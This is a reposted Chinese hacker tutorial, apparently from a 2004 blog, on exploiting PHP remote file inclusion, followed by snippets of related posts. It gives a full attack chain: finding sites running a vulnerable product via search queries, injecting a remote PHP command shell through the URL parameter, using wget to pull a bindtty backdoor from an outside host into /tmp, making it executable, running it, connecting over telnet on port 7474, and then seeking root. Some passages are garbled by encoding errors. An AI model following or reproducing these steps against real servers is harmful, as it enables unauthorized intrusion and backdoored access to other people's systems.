远程文件包含漏洞的利用

转载 2004年09月13日 17:32:00

远程文件包含漏洞的利用



 

****************************
*AuThor:CrAcKlOvE          *
*emA!l:CrAcKlOvE#zJ.cOM    *
*HoMePaGe:N/a,mAyBe DoWn   *
****************************
1)什么是远程文件包含漏洞?
让我们先看看以下代码,
<?
<!---     cOdz    --->


include($page);


<!---     cOdz    --->
?>


由于$page变量缺少充分过滤,判断$page是不是本地的还是远程服务器上的,因此我们可以指定远程服务器的文件作为参数提交给$page变量,
以web权限执行远程文件.


2)漏洞的初步应用
假设某一站点的index.php代码如下
<?
<!---     cOdz    --->


include($page);


<!---     cOdz    --->
?>
我们就可以提交:
http://siteurl.tld/index.php?page=http://远程服务器/文件名称
假设?
颐窃冻涛募莆獁arez.php,内容为
<?
<!---     cOdz    --->


system("ls /tmp/");


<!---     cOdz    --->
?>
这样就能把warez.php下载到本地,并且执行! 说白了,就是把tmp下的文件显示出来.


3)实战演练
说了一大堆,现在开始锻炼实践能力了,嘿嘿.
⑴准备工作:
①存在远程文件包含漏洞的站点
②phpshell
③Backdoor


对于①,大家可以到www.cnns.net或者www.securiteam.com关注近期的漏洞,一定会有的,我们拿最近的Artmedic kleinanzeigen漏洞练手.
Artmedic kleinanzeigen由于index.php的$site变量缺少过滤,导致了远程文件包含漏洞.所以我们可以提交以下url
http://Artmedic kleinanzeigen url/path/index.php?site=http://phpshellurl
那如何找到使用Artmedic kleinanzeigen的站点呢?这里有个小技巧,我顺便说一下.
我先去Artmedic kleinanzeigen的官方站找到Artmedic kleinanzeigen程序的演示,随便点了个连接,
连接为http://siteurl.com/index.php?site=anzeigenmaerktestart,于是?
蚩猤oogle.com,搜索index.php?site=anzeigenmaerktestart,
那些!
使用Artm
edic kleinanzeigen的站就差不多出来了,我们可以一一去尝试!


对于②,我推荐Data Cha0s PHP Command/Safemode Exploit 4.1,或者angel的saphpshell,phpspy,功能都不错.


对于③,你可以使用绑定端口的程序bind,然后根据程序绑定的端口telnet.你可以使用san以前用过的Digit-Labs Connect-Back Backdoor,
不过我经常使用bindtty,bindtty绑定7474端口.


⑵开始利用
①提交http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=id
说明一下,cse.gif是上文所说的Data Cha0s PHP Command/Safemode Exploit 4.1,cmd=id是查询当前用户的权限.
一般所都是uid=99(nobody) gid=99(nobody) groups=99(nobody),uid不是0,所以他不是root级别的帐户.
竟然可以执行,那么说明system函数没有被禁止,那我们就可以大胆的执行命令了!


②提交http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=wget http://phphot.com/bindtty -O /tmp/bindtty
这样就把bindtty下载到tmp目录下.可能你会为,为什么要下到tmp目录下呢?因为tmp目录一般都可写.


③文件已经下载了,我们必须设置属性,不然运行不了,会提示没有权限.
http:!
//xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=chmod 775 /tmp/bindtty
这样我们就有权限执行bindtty文件了!


④执行bindtty
http://xxx.de/index.php?site=http://phphot.com/cse.gif?cmd=/tmp/bindtty
成功的话,它会显示Daemon is starting...OK, pid = xxxx.
因为上文已经说bindtty绑定的是7474端口,现在我们可以telnet host 7474.
ps:不推荐使用windows命令提示符进行telnet,会出现字符混乱的现象,推荐使用putty.


⑤提升到root,这就是你的工作了.你可以根据cse.gif所显示的一些信息寻找对应的exploit进行提升权限.


这样就差不多结束了,有问题的话欢迎提出.

PHP漏洞挖掘之旅——远程文件包含漏洞

PHP漏洞挖掘之旅——远程文件包含漏洞 2011, April 21, 8:31 AM. PHP学习 Submitted by admin  本篇文章源自《黑客防线》...
  • kendyhj9999
  • kendyhj9999
  • 2014年05月25日 12:10
  • 1731

远程文件包含漏洞测试

在本地搭建test.php if( !ini_get('display_errors') ) {   ini_set('display_errors', 'On');   } error_rep...
  • xing_anksh
  • xing_anksh
  • 2013年09月16日 17:15
  • 1196

文件包含漏洞的利用

本地包含 普通本地包含 只要网站支持上传,上传任意后缀文件,只要其中包含一句话,包含即可执行。 测试代码 POC http://127.0.0.1/test/123.php?f=test.txt ...
  • wangyi_lin
  • wangyi_lin
  • 2013年08月08日 22:26
  • 5663

[web安全] 文件包含漏洞

严格来说,文件包含漏洞是“代码注入”的一种。 “代码注入”的典型代表就是文件包含(File Inclusion)。文件包含可能会出现在JSP、PHP、ASP等语言中。 PHP常见的导致文件包含的函数如...
  • hitwangpeng
  • hitwangpeng
  • 2015年05月24日 16:05
  • 7940

远程包含和本地包含漏洞的原理

首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时...
  • iiprogram
  • iiprogram
  • 2008年04月30日 17:04
  • 5553

dedecms-v5.7-sp1远程文件包含getshell

前段时间自己搭了个dedecms-v5.7-sp1的靶机来练手,偶然在网上发现了一篇靠谱的文章,讲的是dedecms的一个远程文件包含getshell的方法,理解了以后决定自己再写出来,以加深印象~ ...
  • What_Happened
  • What_Happened
  • 2016年12月13日 14:13
  • 1975

php文件包含漏洞利用

上周我们部门弄了一个web安全的兴趣小组。说实话实在惭愧我虽然在安全公司每天都面对着各种漏洞,但是对渗透技术知之又少。于是加入兴趣小组后痛下决心好好学习渗透知识。 现在记录一下上周兴趣小组出的一个测试...
  • qq1124794084
  • qq1124794084
  • 2017年03月21日 09:22
  • 1132

文件包含漏洞(绕过姿势)

文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利...
  • zxchhyg
  • zxchhyg
  • 2017年06月01日 14:29
  • 1902

dvwa文件包含漏洞和远程文件利用漏洞

关于dvwa的这两个漏洞 首先在Metaspilotable里面是默认关闭的 所以我们首先是要打开这两个漏洞 首先命令进入配置文件 sudo vi /etc/php5/cgi/php.ini ...
  • sinat_36188088
  • sinat_36188088
  • 2017年01月03日 00:08
  • 507

文件包含漏洞浅析

0x00 文件包含概念以及分类  程序开发人员通常会把要重复使用的函数写到单个文件中,在使用某个函数时直接在文件里面调用此函数无需再次编写。  文件包含有两种:   本地文件包含   远程文件包含 ...
  • fuckcat_2333
  • fuckcat_2333
  • 2016年08月05日 20:59
  • 1480
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:远程文件包含漏洞的利用
举报原因:
原因补充:

(最多只允许输入30个字)